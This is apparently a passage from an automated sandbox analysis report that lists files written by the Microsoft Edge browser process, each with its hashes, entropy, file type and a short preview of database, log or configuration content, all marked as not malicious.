                                                                                                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:L:L
                                                                                                                                                                                                                                                                MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:.
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (17009), with no line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):17015
                                                                                                                                                                                                                                                                Entropy (8bit):5.499922414789494
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:st5PGQSu4Cs4ZXV+Vl1xSqDQ3iQrTAbGCQwX07NIl:s7OXuxZwnCX3TobGxji
                                                                                                                                                                                                                                                                MD5:C6B9EAC0593628222373CC85DA9D652A
                                                                                                                                                                                                                                                                SHA1:9D63F3CAB0D8234A4B65B32C9EC04CBAD9A3D7B1
                                                                                                                                                                                                                                                                SHA-256:9A095E4900139BAA6B1BEDB287370D927763C408745E309FB67649B8FA8B4FED
                                                                                                                                                                                                                                                                SHA-512:C13A1D0D75E291E0BC355B0DAA46B670B04D802E4E4A3F286EB36AC49408DD32BF31EDCEC5B87719B0D5ADA3A073EFDAC01B0E47766F3EF3DE1BE103CE62E867
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):33
                                                                                                                                                                                                                                                                Entropy (8bit):3.5394429593752084
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                                                                                                                                                                                MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                                                                                                                                                                                SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                                                                                                                                                                                SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                                                                                                                                                                                SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:...m.................DB_VERSION.1
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):309
                                                                                                                                                                                                                                                                Entropy (8bit):5.255578930715595
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:7AH0RM1CHhJ23oH+Tcwtp3hBtB2KLlpAWVq2PCHhJ23oH+Tcwtp3hBWsIFUv:7ooAYebp3dFLTjVvBYebp3eFUv
                                                                                                                                                                                                                                                                MD5:1C58035CAA4255A7FDF4F21574347DA8
                                                                                                                                                                                                                                                                SHA1:B1E6685FA219E9AD54BCB40C93FAD7A49FCB8677
                                                                                                                                                                                                                                                                SHA-256:A704D9ADEAEDE6EAD4E346918BFAB09C87941DDD51BC0364DC07F7F990B8CAF2
                                                                                                                                                                                                                                                                SHA-512:84B7C59C8BCAE7E034A28CE4987D633755404B46683AEED80D707BEFA8344ADEF68D94A7BEA6B904133924D9A6B9532D01B1600B9A3931121327A1418737A830
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:2024/12/16-07:47:14.513 1fe4 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2024/12/16-07:47:14.737 1fe4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):41
                                                                                                                                                                                                                                                                Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                                Size (bytes):1764710
                                                                                                                                                                                                                                                                Entropy (8bit):5.138097330002853
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24576:hKPOfKfgXaHbMhFQlmADAbpENUdifYOBHbc2r:hKmfqJmcx
                                                                                                                                                                                                                                                                MD5:A39A17DF31BC28E1AFF0350FE1E51DED
                                                                                                                                                                                                                                                                SHA1:355007EA6EAB659DB0A79EFE94A902F747B6827D
                                                                                                                                                                                                                                                                SHA-256:37AC9ED8A32BA2291A1DEB7F8C2B09718F138A6FD1E054F3219EA7BDA24DEABC
                                                                                                                                                                                                                                                                SHA-512:63BF5B3F015AC5ACB6046825FDB4C9372880894555BE5F3BC075912CD5A4422006E00A6AB8B5F4931AB444C4980CD961233593796A8671CEA6143963F4EE01E6
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:...m.................DB_VERSION.1.Go..................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13340967444415546.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):336
                                                                                                                                                                                                                                                                Entropy (8bit):5.169065963377811
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:7A0q2PCHhJ23oH+Tcwt9Eh1tIFUt8OAxhFZZmw+OA8ckwOCHhJ23oH+Tcwt9Eh1H:7rvBYeb9Eh16FUt8OwX/+OE56Yeb9Ehx
                                                                                                                                                                                                                                                                MD5:CF7D63975AFAAB9D6398C1106D4E9227
                                                                                                                                                                                                                                                                SHA1:185C499A0A719A38F015DB43C6D75BE32DEAFF2C
                                                                                                                                                                                                                                                                SHA-256:F377D0C90A5F74C90C4C34AD7D515286DE2D8DAEB851BC02F60A2958841C0830
                                                                                                                                                                                                                                                                SHA-512:38EC42D5D1A9ED081FD8C50942E7496D6A09E3FEDB19429A1016DB483D653C7B4192BB63766B38CCEC7963F03E532548A8DD40C5FC7CEC0E68D0DC4F37DC883C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:2024/12/16-07:47:14.387 1170 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/16-07:47:14.389 1170 Recovering log #3.2024/12/16-07:47:14.392 1170 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):28672
                                                                                                                                                                                                                                                                Entropy (8bit):0.46331128768562296
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBu5L:TouQq3qh7z3bY2LNW9WMcUvBuV
                                                                                                                                                                                                                                                                MD5:0F46428545ECA8D0A9ADDA73676C4DAF
                                                                                                                                                                                                                                                                SHA1:66179EC6A8CBA8A2E417F3968A725A93E64538DC
                                                                                                                                                                                                                                                                SHA-256:375381C4AD83620CAFB4ADBB182C3C396613B03FAC3BF83BC6582466A6DE4060
                                                                                                                                                                                                                                                                SHA-512:E05F980AF534CC71A0EF1E808C52042AEE1E77A32263B7D208D5EAC63741E3E4854CF3B0D5E80BFB2B8E8B71C0FACF8D3CAAD81C02CFE9800230F7C72936E334
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):345
                                                                                                                                                                                                                                                                Entropy (8bit):5.271620942937293
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:7Aq+q2PCHhJ23oH+TcwtnG2tMsIFUt8OAuZmw+OAqVkwOCHhJ23oH+TcwtnG2tM2:7WvBYebn9GFUt8OP/+Od56Yebn95J
                                                                                                                                                                                                                                                                MD5:4C19E3D247BA0608BFECCB1773840883
                                                                                                                                                                                                                                                                SHA1:A80B208F2EE92173D34168CD5C2C8B7F163ECB7D
                                                                                                                                                                                                                                                                SHA-256:CC598C3A921FEB3E9CFF0642104A671689D7A70E8005DFBCF122DE2FCFDDF482
                                                                                                                                                                                                                                                                SHA-512:97BFF3FAB427B30AB9B7C5260A497EBF1775D6234092AA596A50F685B8823AD4FC3C7C9DD82146B9DC06785DF1A3262808CF235437FE309F23C1BE57321F0648
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:2024/12/16-07:47:09.520 b18 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/16-07:47:09.520 b18 Recovering log #3.2024/12/16-07:47:09.520 b18 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                                                Entropy (8bit):0.611752685321821
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:TLapR+DDNzWjJ0npnyXKUO8+jFUDpe4mL:TO8D4jJ/6Up+JUi
                                                                                                                                                                                                                                                                MD5:F9AF95D5438A135712370705C9D2827B
                                                                                                                                                                                                                                                                SHA1:E0887360AED8B05DF7470EAAFAB517DC9A3F212B
                                                                                                                                                                                                                                                                SHA-256:4FB132458F22C6CDD9ADEDB2C0A606B816C0813125250E8AEA79E188BDDAE7A0
                                                                                                                                                                                                                                                                SHA-512:68F26902D29C35FE0FE94007FB930CCAD9838129D78C2FC0D3BF3E19843B9BA298ED016BB1624DE0DA97AFD5478B8A19B9A625C223FD120D3A6D5C5C55AEFA61
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j...%.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):375520
                                                                                                                                                                                                                                                                Entropy (8bit):5.354172478845045
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6144:YA/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:YFdMyq49tEndBuHltBfdK5WNbsVEziPU
                                                                                                                                                                                                                                                                MD5:5B3F85DA3F34815DD71F14DC22490216
                                                                                                                                                                                                                                                                SHA1:7097EA1451E6B3EE2859A1DC1B10EFD008134E19
                                                                                                                                                                                                                                                                SHA-256:3BBFC6BB094D113D2DF0E9809AFF2ADAD79901C96E1D37449FBF4387C42BEC55
                                                                                                                                                                                                                                                                SHA-512:8B97D1A5C38D61E9E328FEC3AAB32991B29317969D9ED6562049069CDBA6C617A48F1601E6F505AEF0D655E9803BA6A6DD9AA21CFC35E4A694B1427B55534904
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:...m.................DB_VERSION.1....q...............&QUERY_TIMESTAMP:domains_config_gz2.*.*.13378826837343446..QUERY:domains_config_gz2.*.*..[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):309
                                                                                                                                                                                                                                                                Entropy (8bit):5.196952953237287
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:7ABB1CHhJ23oH+Tcwtk2WwnvB2KLlpAj+q2PCHhJ23oH+Tcwtk2WwnvIFUv:7oYebkxwnvFLTHvBYebkxwnQFUv
                                                                                                                                                                                                                                                                MD5:876D80FB9EE2E78598BFA31E658EBD8C
                                                                                                                                                                                                                                                                SHA1:B0988432D2361EB590B69752E0ACB329A987CDE6
                                                                                                                                                                                                                                                                SHA-256:865B9C9BAD646CBAF8F6003355E1143BFA4B900AD485B5CFAE6E77D5699C64F1
                                                                                                                                                                                                                                                                SHA-512:AD963CC4D86A17E174055DE710D82976465A606AF79C2D2185AB2089C514FF5AEC273BEAE80C7CF2CA5580A2CB3C9ADC584E56759449151ACB23456E9F0A5FAF
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:2024/12/16-07:47:14.466 ef8 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2024/12/16-07:47:14.749 ef8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):41
                                                                                                                                                                                                                                                                Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                                Size (bytes):358860
                                                                                                                                                                                                                                                                Entropy (8bit):5.324605139479234
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6Rr:C1gAg1zfvz
                                                                                                                                                                                                                                                                MD5:EA7DEB1633EA6BA1E9FCB6FACFE994CD
                                                                                                                                                                                                                                                                SHA1:E04F12BEA6BA43E1A55ABE91C7B9834E3EBC653F
                                                                                                                                                                                                                                                                SHA-256:B973076509C13763000EB2509221FE20070CA6627F4D7B3F12621026DDD2B75E
                                                                                                                                                                                                                                                                SHA-512:2C8968D26F231676E0AC5DB3D32FC2B27F1F1FF33F7A4251C6139D6E7F3E4953A518373AE18D4DFB69F4DB1133C64FBE090A8AB74A0C9B7940B7CEE8B0A89E42
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"aee_config":{"ar":{"price_regex":{"ae":"(((ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)))","dz":"(((dzd|da|\\x{062F}\\x{062C})\\s*\\d{1,3})|(\\d{1,3}\\s*(dzd|da|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}|egp)\\s*\\d{1,3})|(\\d{1,3}\\s*(e\\x{00a3}|egp)))","ma":"(((mad|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(mad|dhs|dh)))","sa":"((\\d{1,3}\\s*(sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633}))|((sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633})\\s*\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})|(\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):418
                                                                                                                                                                                                                                                                Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):324
                                                                                                                                                                                                                                                                Entropy (8bit):5.278003944835078
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:7AOO+q2PCHhJ23oH+Tcwt8aPrqIFUt8OA6Zmw+OAWVkwOCHhJ23oH+Tcwt8amLJ:7RvBYebL3FUt8ON/+O/56YebQJ
                                                                                                                                                                                                                                                                MD5:7FD11C48E4E5EDD030D8032A4B3C6E2F
                                                                                                                                                                                                                                                                SHA1:C2809F653050B7990F76B00D9A2EB08275CB0249
                                                                                                                                                                                                                                                                SHA-256:ACCD487C4A66526308161E850F53C4F8D478DFE9B436499EAC9D45CFE900AA75
                                                                                                                                                                                                                                                                SHA-512:A1EB9B4043F6F5E474B19A2D03CCFB4EA430E1EB0E0AB47243405AF0DFCD5047544C7AD5E0DDE1B622699AF76C413B9154C31122CF3C3209825C4B382190552E
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:2024/12/16-07:47:09.547 1b48 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/16-07:47:09.548 1b48 Recovering log #3.2024/12/16-07:47:09.548 1b48 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):328
                                                                                                                                                                                                                                                                Entropy (8bit):5.302809172031791
                                                                                                                                                                                                                                                                Encrypted:false
